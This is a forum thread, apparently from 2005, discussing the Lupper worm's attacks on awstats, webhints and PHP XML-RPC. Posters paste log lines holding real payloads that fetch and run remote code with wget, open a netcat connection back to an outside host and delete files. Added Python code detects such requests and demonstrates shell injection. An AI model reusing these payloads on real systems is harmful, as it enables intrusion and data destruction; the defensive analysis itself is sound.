So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.
Both can be made vulnerable by installing systems/scripts that are not part of the default system.
But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.
The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.
Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.
Um, AWStats isn't written in PHP, but in Perl. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app.
Need a Linux consultant in New Orleans?
I just grep'd through my logs and found someone trying (perhaps beta-testing?) this exploit back in June 2005:
xx.xxx.xx.xx - - [18/Jun/2005:05:51:35 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.suxehacker.home.ro/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;echo%20;echo| HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Anyone know how to make /tmp noexec on OS X?
Hopefully from now on all worms and viruses will be named according to the OS they affect. I'm tired of hearing Windows worms/viruses referred to as if they were affecting all computers everywhere.
if member of {Windows, Sysadmin} then not exist
This is not a flaw in Linux. It is a vulnerability in a script written in PHP that a sysadmin may install on a Linux box.
This has nothing to do with whether "valuable and important data" is stored on a Linux box.
If Linux was used by 10x more people/systems, there is no reason to believe that we'd see 10x more worms/viruses in the wild.
Yet every time the topic of a Linux worm/virus/trojan comes up, someone will make a comment about how it will only happen more as Linux becomes more popular.
the threat level is low to very low depending on reporting site and their need for money.
I prefer the "u" in honour as it seems to be missing these days.
So if you have a Windows, Solaris, OS-X, etc PHP system that has a problematic script, it could probably exploit and get in, but when it tried to run there'd be an error, since the OS wouldn't recognise the executable format. Other OSes that can do Linux binaries like FreeBSD could be potentially infected, but that's probably it. Also probably only works on x86 Linux, not PPC.
I'd try to sell a network/email scanning/monitoring package, myself, for the 'enterprise' environment. Company-wide antivirus for the network.
The World Wide Web is dying. Soon, we shall have only the Internet.
There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.
The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.
That's what you believe. Yet my bank example shows that popularity has nothing to do with security.
That is because your statement is as inaccurate as possible already.
By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.
And security is why this worm will not do much damage.
http://securityresponse.symantec.com/avcenter/ven
Look for "Number of Infections: 0-49".
Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!
What's that? "Number of Sites: 0-2"?
That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?
Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.
Looks like this guy has already been infected:
tail error_log
[client 211.214.161.159] script '/var/www/html/xmlrpc.php' not found or unable to stat
[Tue Nov 08 11:42:41 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/blog
[Tue Nov 08 11:42:42 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/blog
[Tue Nov 08 11:42:44 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/blogs
[Tue Nov 08 11:42:45 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/drupal
[Tue Nov 08 11:42:46 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/phpgroupware
[Tue Nov 08 11:42:47 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/wordpress
[client 211.214.161.159] script '/var/www/html/xmlrpc.php' not found or unable to stat
[Tue Nov 08 11:42:50 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/xmlrpc
[Tue Nov 08 11:42:51 2005] [error] [client 211.214.161.159] File does not exist: /var/www/html/xmlsrv
4. Host with a good website company like 34sp.com (shameless plug with who I am hosted on)
Sweet! Do you get that girl on the front page after signing up for a year prepaid?
I love all the damage control the fanboi's throw out there.
OH THIS ISN'T A BIG DEAL
OH THIS ISN'T A LINUX PROBLEM SPECIFICALLY
OH IT'S ONLY ON THE 3RD SUNDAY OF THE 5TH MONTH
OH IF THIS WERE WINDOZ (INSERT NOT FUNNY JOKE HERE)
Come on guys, admit you got stung and deal with it. The more popular Linux becomes the more hackers will want to get into it. And since all the source for just about everything is out there, it's a lot easier for the smart ones to find, test, & exploit vulnerabilities.
You're no more secure than the rest of us, you just weren't on the radar. Now you are. Expect more to come.
Gadget News at Gizmo.com
I'm not seeing anything on my logs.
Why don't you post 10 of those "large number of IP addresses" so substantiate your claim?
Web SERVER. Server! Not browser!
Gotta catch em all.
Why bother hiding the source IP?
cho$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:29 -0500] "GET /scgi-bin/webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:30 -0500] "GET /hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:31 -0500] "GET /cgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:32 -0500] "GET /scgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:33 -0500] "GET /cgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:35 -0500] "GET /scgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:36 -0500] "GET /hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:37 -0500] "GET /cgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:38 -0500] "GET /scgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:39 -0500] "GET /webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.108.119.131 - - [08/Nov/2005:11:57:40 -0500] "GET /cgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.
-- I Dont Deserve A Sig I Have Bad Karma
First scan at my webserver:
xx.113.128.xxx - - [17/Feb/2005:04:36:36 -0800] "GET /cgi-bin/awstats.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Second scan:
xxx.19.218.xx - - [18/Feb/2005:05:58:19 -0800] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
An attempt a few days (and a few scans) later which appears to be a self-sustaining worm:
xx.221.80.xx - - [26/Feb/2005:18:30:46 -0800] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.ment0ru.home.ro%2fnc%3bchmod%20%2bx%20nc%3b.%2fnc%20something4u.propagation.net%2065000%20%7c%20 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
Or is this a different worm that exploits awstats?
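A way to pull requests like the ones quoted in the two log posts above (the hints.cgi sweep and the awstats configdir probes) out of an Apache access log, written as an added example for this thread. It is not code from the page, from McAfee or from any of the projects named. It undoes the two obfuscations those posts show, percent-encoding and `$IFS` standing in for spaces, then tags the awstats `configdir=|` pipe, the webhints-style `?|cmd` query, the wget-then-chmod-then-run chain and the xmlrpc.php path walk. The log lines inside it are constructed from the shapes quoted in the thread with placeholder addresses, and the tag names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log format, modelled on the
# requests quoted in this thread. IPs and download hosts are placeholders.
SAMPLE_LOG = r'''
10.0.0.1 - - [08/Nov/2005:11:57:30 -0500] "GET /hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`192.0.2.10/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`192.0.2.10| HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
10.0.0.2 - - [26/Feb/2005:18:30:46 -0800] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20dl.example.invalid%2fnc%3bchmod%20%2bx%20nc%3b.%2fnc%20c2.example.invalid%2065000%20%7c%20 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.3 - - [08/Nov/2005:11:42:44 -0500] "GET /blog/xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
10.0.0.4 - - [08/Nov/2005:12:00:00 -0500] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
'''

# Apache combined log: ip ident user [time] "METHOD target HTTP/x.y" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) HTTP/\d\.\d" (?P<status>\d{3}) \S+'
)

# Paths the November 2005 scanner walks looking for a reachable xmlrpc.php.
APP_PROBE_RE = re.compile(r'/xmlrpc(\.php)?$|/(blog|blogs|drupal|wordpress|phpgroupware|xmlsrv)/?$')
# Fetch a file, then chmod / interpret / run it: the download-and-execute stage.
DOWNLOAD_EXEC_RE = re.compile(r'\b(wget|curl|lynx|fetch)\b[^;|]*[;|].*(\bchmod\b|\bperl\b|\bsh\b|\./)')

# Tags that mean "someone tried to run a command", as opposed to a path probe.
HIGH = {'ifs-obfuscation', 'awstats-configdir-pipe', 'leading-pipe', 'download-and-execute'}


def decode_request(target: str) -> str:
    """Undo the two obfuscations seen in the thread: percent-encoding and $IFS-for-space."""
    return unquote(target).replace('$IFS', ' ')


def classify(target: str) -> list:
    """Return indicator tags for one request target (path?query); empty list if clean."""
    raw_query = target.partition('?')[2]
    decoded = decode_request(target)
    path, _, query = decoded.partition('?')
    tags = []
    if '$IFS' in raw_query:                       # spaces hidden from naive filters
        tags.append('ifs-obfuscation')
    if re.search(r'(^|[?&])configdir=\s*\|', decoded):   # awstats configdir=| pipe
        tags.append('awstats-configdir-pipe')
    if query.lstrip().startswith('|'):           # webhints hints.cgi?|cmd
        tags.append('leading-pipe')
    if DOWNLOAD_EXEC_RE.search(decoded):
        tags.append('download-and-execute')
    if APP_PROBE_RE.search(path):
        tags.append('app-probe')
    return tags


def scan_log(text: str) -> list:
    """Parse each log line and return a finding dict for every line that carries a tag."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m['target'])
        if tags:
            findings.append({
                'ip': m['ip'], 'time': m['ts'], 'status': int(m['status']),
                'target': m['target'], 'decoded': decode_request(m['target']),
                'reasons': tags, 'severity': 'high' if HIGH & set(tags) else 'low',
            })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:4} {f['ip']:10} {f['reasons']} {f['decoded'][:80]}")
```

Feed it `access_log` with `scan_log(open(path).read())`; a 404 on these lines only means the script was not at that path, so the interesting findings are the high-severity ones that got a 200.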
According to the linked site, you are vulnerable if you are running PHP (version?) and have a /{website dir}/cgi-bin directory. I guess that means anyone running PHP is vulnerable?
-"...bad old ideas look confusingly fresh when they are packaged as technology" - Jaron Lanier (Digital Maoism on Edge.o
I would like to point out a significant detail. It is far easier to deflect blame away from Linux than it is from Windows because, unlike Windows, Linux doesn't "automatically install" anything. Linux is just a kernel. A linux distro is just a Linux kernel with hundreds of "3rd party apps" tacked on. I'm not knocking Linux at all. I love Linux. But it's not a fair comparison when you're playing the "installed by default" game. The Linux kernel is 100% secure because it can't do anything by itself.
If you mod me down, I shall become less powerful than you could possibly imagine.
Several people have noted that this only affects systems that allow a CGI or PHP script to execute arbitrary programs. I don't think most Windows systems have that sort of "shell" access from CGI/PHP. Then again, I know ALAP about Windows...
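The class of bug behind the `configdir=|...` requests in this thread, reduced to a few lines of Python as an added illustration. This is not awstats' own code (which is Perl) and not anything from the page: a request parameter spliced into a shell command line, beside a version that treats the parameter as a name to look up rather than text to run. The site list and config root are hypothetical.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Hypothetical site list and config root, standing in for whatever the real
# application keeps; not awstats' own layout.
ALLOWED_SITES = {"default", "www.example.com"}
CONFIG_ROOT = Path("/etc/awstats")
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def vulnerable_command(configdir: str) -> str:
    """The bug class: an untrusted request parameter spliced into a shell command line."""
    return f"cat {configdir}/awstats.conf"


def vulnerable_read(configdir: str) -> str:
    """Runs the spliced command through a shell. DO NOT copy: it exists to show the failure.
    A value starting with '|' turns the file name into a pipeline, exactly as the
    configdir=| requests quoted above intend."""
    proc = subprocess.run(vulnerable_command(configdir), shell=True, text=True,
                          capture_output=True, stdin=subprocess.DEVNULL, timeout=5)
    return proc.stdout


def hardened_read(site: str, root: Path = CONFIG_ROOT) -> str:
    """Treat the parameter as a name to look up, never as text to execute.

    Three independent checks: a syntactic allowlist (no '/', no leading '.'),
    membership in the configured site list, and a resolved-path containment
    check against the config root. No shell is involved at any point."""
    if not SAFE_NAME.fullmatch(site):
        raise ValueError(f"rejected site name: {site!r}")
    if site not in ALLOWED_SITES:
        raise ValueError(f"unknown site: {site!r}")
    path = (root / f"awstats.{site}.conf").resolve()
    if root.resolve() not in path.parents:
        raise ValueError("config path escapes the config root")
    return path.read_text()


def hardened_demo() -> dict:
    """Exercise hardened_read against a throwaway config root with one real config file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "awstats.default.conf").write_text("LogFile=/var/log/httpd/access_log\n")
        result = {"default": hardened_read("default", root)}
        for bad in ("| echo INJECTED #", "../../etc/passwd", "www.example.com"):
            try:
                hardened_read(bad, root)
                result[bad] = "accepted"
            except (ValueError, FileNotFoundError) as e:
                result[bad] = type(e).__name__
    return result


if __name__ == "__main__":
    payload = "| echo INJECTED #"   # same shape as the configdir=| payloads in the thread
    print("shell sees:", vulnerable_command(payload))
    print("output    :", vulnerable_read(payload).strip())
    for name, outcome in hardened_demo().items():
        print(f"hardened  : {name!r} -> {outcome.strip()}")
```

The allowlist alone would stop these payloads; the path containment check is there for the day someone widens the regex. Note that `www.example.com` passes both name checks and fails only because no such file exists, which is the correct failure mode.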
Just like you would any other directory on any other Unix: pass "noexec" as a flag to the mount command that creates the tmp directory (http://www.netadmintools.com/html/8mount.man.html ):
mount -o remount,noexec /tmp
Glad I'm running li-- wait, what?
why... That's not MS sharing the IE love, it's them trying to open up Macs to viruses, those dirty scoundrels!
192.50.74.27
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:49 PST
All 1663 scanned ports on 192.50.74.27 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 38.322 seconds
========
195.200.183.229
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:51 PST
Interesting ports on 195.200.183.229:
(The 1661 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap finished: 1 IP address (1 host up) scanned in 62.432 seconds
========
200.218.224.224
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:53 PST
All 1663 scanned ports on 200.218.224.224 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 39.839 seconds
========
202.123.223.148
I killed the process after 2 minutes.
========
210.109.194.231
I killed this one too.
========
211.155.246.38
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 10:01 PST
All 1663 scanned ports on 211.155.246.38 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 38.386 seconds
========
Okay, I'm stopping there. I was under the impression that I'd be seeing some open ports. I can only verify port 80 on ONE of those so far.
How OLD are those entries? Why does it appear that the problem, if it ever existed on those machines, has been cleared already?
How did we get stung? Not being dependent on Micro$hit to deliver fixes to buggy 3rd-party scripts, this was "fixed" back in February. *Yawn.*
Now, I don't think most worms really process such errors but it makes me feel better than just ignoring them, and it seems to be far more legal than either redirecting them to fbi.gov or launching some kind of counterattack.
PHEM - party like it's 1997-2003!
You need to escape those #s, too.
Don't tell the windows people that linux has security holes, they may decide it's payback time!
"A new Linux worm is crawling the web looking for a large number of vulnerable PHP systems and applications."
Good luck buddy, I don't think you're gonna find 'em...
What every sysadmin should know is that the unpatched known holes of today are not only open doors for crackers, they are the open doors for the next worms.
Every sysadmin should check security sites like Secunia, with a list of unpatched known holes for each software they use:
http://secunia.com/
If you ever visit Reality, drop in and we'll have a beer.
I think I saw that movie, too. It was pretty good. Too bad it was so Hollywood and unrealistic.
Really? I would be? Let's see.
http://www.fbi.gov/ucr/cius_02/pdf/02crime2.pdf
So, the FBI records 402,637 "robberies". Of which, 2.3% are bank robberies.
So, all other robberies account for 97.7% of the total. But banks account for only 2.3% (or about 9,261 bank robberies).
But you think that "banks aren't particularly secure"?
Strange. I mean, since murder would normally be seen as having "repercussions" that are "more severe" and all. But the FBI records 16,204 murders.
Yet more murders than bank robberies.
Nope. The analogy is solid.
It's just that the facts seem to contradict your position.
Anyway, if you're ever in the neighborhood of Reality, stop in for a beer.
Unless you have tripwire or some off-disk checksums of your hard drive, you have no choice but to wipe and re-install configs and data from backups. If you haven't designed your systems to make this easy (keep all configs in /etc, /usr/local/etc, keep all customer data in one dir, etc), you're just making extra work for yourself OR making excuses why you shouldn't clean up a pwned machine.
Sure, 99% of the time, script kiddies are easy to clean up after. You might run into that 1% that make themselves root with an unpublished exploit, and install a kernel mod to hide themselves, and you think "oh, it's just some kiddies littering /tmp, big deal".
That's happened to me exactly once in my 10+ year career, but once was too much!
Here are the reported numbers:
"Sources" is a count of infected PCs, i.e., unique IP addresses "originating traffic".
"Targets" are the PCs "receiving traffic".
"Records" is the number of PACKETS observed.
What is odd is that while there are supposedly 111 PCs that are infected and sending out hack attempts, those 111 PCs seem to target ONLY 8 PCs, and the total PACKETS transmitted/received on 11/03 was only 22K. Very strange. Very LOW numbers and with a VERY LIMITED number of boxes.
Notice that the majority of "infections" are occurring on Nov 3, 4 and 5, and the reports from THREE anti-virus houses are on the 4th and 5th, the same day as the big spike in the "infection":
A scan from VirusTotal detects "cback" as:
Antivirus Version Update Result
Fortinet 2.48.0.0 11.04.2005 Linux/Rev.B-bdr
Kaspersky 4.0.2.24 11.05.2005 Backdoor.Linux.Small.al
McAfee 4620 11.04.2005 Linux/BackDoor-Rev.b
For such an infinitesimally small number of supposedly hacked boxes these three anti-virus houses already have detection software which can see the "trojan". That is REALLY FAST detection code writing, deployment and reporting for such a SMALL number of boxes.
Has someone salted the Linux anti-virus mine to hype business?
Running with Linux for over 20 years!
if you're using mod_security on Apache/UNIX platforms, you can set this globally.
SecFilterSelective "THE_REQUEST" "xmlrpc\.php" "deny,status:412"
and only enable for VirtualHost blocks that need it. be sure to patch your stuff!
SecFilterSelective "THE_REQUEST" "xmlrpc\.php" "allow,log"
you can also enable Apache's SetEnvIf & conditional logging to pipe all xmlrpc.php requests to a centralized log file for analysis.
:)
If you were in their situation, what would you do?
Considering that there is already ClamAV in Linux space? I'd probably be weaving a golden parachute.
This sig. intentionally left blank.
I've often noted that when faced with facts, the loser will make some braggart statement instead of attempting to present facts of his own.
And you're another example of that.
I've posted links and facts. You only have your claims based upon your complete lack of understanding of security. Buh bye!
It's called using the vernacular.
In a conversation like this, the obvious meaning of the word "Linux" is a fully functioning GNU/Linux distribution, consisting of the major components: the Linux kernel itself, everything related to GNU (apps, glibc, etc), and various 3rd party components as chosen by the distribution maintainer.
More help here.
Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
I've been seeing requests for some of these URLs for 6 months now. I figured it was a worm but I know I'm patched and I don't run any of that stuff anyway. Amazing to me that people get owned by this sort of thing.
:-D
Between this and the SSH worm, maybe it's time to investigate using Windows ME with Personal Web Server.
The Anti-Blog
going to members.lycos.co.uk/sugi brings up some other files that look like they are phishers too. I think rather than immediately shut them down, it would be more effective to set up a sting. Lycos could retrieve the last ip address to log into that account. If it wasn't a compromised machine, they could contact the isp. When the next login is attempted, they could have the isp locate which customer it is, and bust down their door.
It's really sad that the AV companies haven't tried to shut the site down via contacting Lycos. It really shows me their commitment to security for the sake of security.
If an officer ever threatens to taze you, say you have a pacemaker.
PHP is neither secure nor insecure. Individual applications are secure or insecure. PHP allows insecure applications and doesn't particularly encourage secure applications, nor does it limit the capabilities of secure applications.
There are application environments that are inherently safe... that is, they implement a sandbox that fails closed. Individual applications may be insecure, but if the application's security fails the attacker does not gain any capabilities that can be used to launch further attacks on other systems or other users on the same system.
The worst part is that most of them know they are infected, but they choose not to do anything about it because it's easier to put up with a slow machine (their infected sooper-dooper boxes, which they only use for email and WildTanget, are slow as a 16 MHz 386) than to learn enough about the problem to fix it.
Since Comcast is too greedy and incompetent to block the customer ports that are clearly spewing virii and worms in all directions (they won't even shut down a human-guided attack unless I call them multiple times) the situation can do nothing but get worse.
Thank you for a well reasoned counterargument. You don't find many of those on here :-)
Regards,
Steve
Yes the title is a troll. No, the point is not.
/. are somewhat (though not much) more helpful than McAfee's removal instructions, which are to upgrade my version of a Windows virus checker. But SD really does not have a better answer for the concerned admin on what he should be looking for to ensure his system is safe.
Linux (and open source in general) is always touted as better than closed-source because there is such a large community of geeks who know the stuff well, so anyone looking for information can tap into the community of geeks to get answers, instead of calling an idiot tech rep for $$/hour.
Except that communities of geeks are notoriously unapproachable, and their willingness to part with their geekily gained information is low. If the responses to this Slashdot article are any indication, geeks are more interested in belittling others (including other geeks) than actually providing useful information.
Albeit the geekish hordes of
BTW, Wordpress 1.5 is safe.
Terrorists can attack freedom, but only Congress can destroy it.
Security is independant of popularity.
There is nothing about popularity that makes a system more or less secure.
No.
No. FEWER banks are robbed because they have BETTER security.
In order to get down to ZERO banks robbed, you'd have to get to PERFECT security.
Because their security is not perfect.
Now you're confusing "risk" with "security".
The two are not the same.
Security != Popularity
Security != Risk
Read "Attack Trees" by Bruce Schneier.
http://www.schneier.com/paper-attacktrees-ddj-ft.
Security is all about reducing the avenues of attack.
If a Linux box is 100% secure from digital attack via the Internet (no ports open), it is still vulnerable to someone breaking into your office and taking the box. Big fat hairy deal. But it is still safe from that worm.
It's not so easy to compare as that. Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...
If an OS, let's call it X, is rare, worms can't spread quickly, just because they can't find instances to spread to. The effects of this are very non-linear, with the popular OS being at a very major disadvantage.
If X is rare, few felons will have the expertise to attack it.
If X is rare, few felons will have the motivation to attack it.
Conversely, if X is widespread, and hated among felons, it will be an attractive target.
If X is commonly business-critical, a great deal of publicity comes with each attack, and felons can get glory from the press and praise from their felonious peers.
The bottom line is that there are many factors beyond the security of an OS in how widespread a worm becomes. In addition to the issues I listed above, consider how quickly patches get pushed out, which depends both on OS support for security patch distribution and administrator attentiveness. Consider the bandwidth of the typical connection, the nature of the hole, how likely it is to be blocked by non-OS firewalls, etc. etc.
So I'm afraid the MS vs Linux security question isn't going to be settled at all by comparing this worm's spread to any other worm, nor even by comparing any large population of worms.
Sorry -- it would be nice if the world were so simple.
Internet Storm Center has information about new variant reported by TrendMicro:
http://isc.sans.org/diary.php?storyid=829
and the description itself is at http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=ELF_LUPPER.B&VSect=P
The reason why this worm exist is due to the wide deployment of Windows Desktops with this specific vulnerability. There just aren't many Linux Desktops out there to bother with them.
Call me a heretic, but this is roughly correct, with some caveats.
OSS systems tend to have patches available faster, so the bugs that lead to worms _can_ be fixed. It's just not realistic to expect that they will be _always_ fixed (or even _often_ fixed). There's also really nothing you can do about the "I love you" strain of worms other than user education.
my ISP blocks port 80 incoming....:-(
(Keeps my firewall logs short at least.)
Microsoft hasn't released an update for IE on OS X since 6/16/2003. They only released that small upgrade from 5.2.1 because of an asinine amount of bugs in 5.2.1, including one that I found and reported. They made a big todo over 5.2.1 being their last Mac release. 2.5 years is more than long enough to consider that IE is no longer available as a Mac product. You can still pick up a Redhat release that supports Sparc (5.x). Does that mean that RH supports Sparcs? No, it doesn't.
p4k1tst0rm ~ # uname -a
Linux p4k1tst0rm 2.6.13-hardened #1 SMP Tue Sep 20 21:24:24 CDT 2005 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux
p4k1tst0rm ~ # cat /etc/gentoo-release
Gentoo Base System version 1.6.13
Bring it on =]
This just goes to show that people are recognizing Linux enough to be willing to write viruses for it.
Linux is to the internet as Duct Tape is to the Universe.
Could it be a one time pad? O_O
I think the developers who left these vulnerabilities open should be financially responsible for the damage this may cause.
"Derp de derp."
i was scanned from 216.128.227.73 (19 hits) and 24.42.129.18 (14 hits).
first tries a wget from 195.224.174.18/nikon, 2. one from 24.224.174.18/listen
both are down.
a third tries to get 62.101.193.244/lupii from 64.246.0.38, but it's down, too.
"listen" is also tried from 24.224.2.174/listen
more info on it here: http://isc.sans.org/diary.php?storyid=823
Still a lot better than, "If you're running Windows you're fucked."
I notice that one of the listed vulnerabilities in awstats - definitely the fault of the administrator because not only is there a patched awstats version to address this well-documented vulnerability (check the project page at sourceforge), but you should also NOT make awstats publicly available. Lock it down so it can be accessed either only from your local/LAN IP range, or at least use http authentication (read up on .htaccess, man htpasswd/htpasswd2).
If you don't understand how to do either, I wouldn't say that you shouldn't be allowed near computers (everyone has to start from somewhere) but I will tell you that you need to RTFM. Yesterday.
Chances are that if you don't have the vulnerable apps locked down or patched already, you've already been rooted. Download/install rkhunter and chkrootkit and run them, keep them updated, set them up on cron jobs (man crontab), and actually read the reports daily - or at least the summaries.
The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50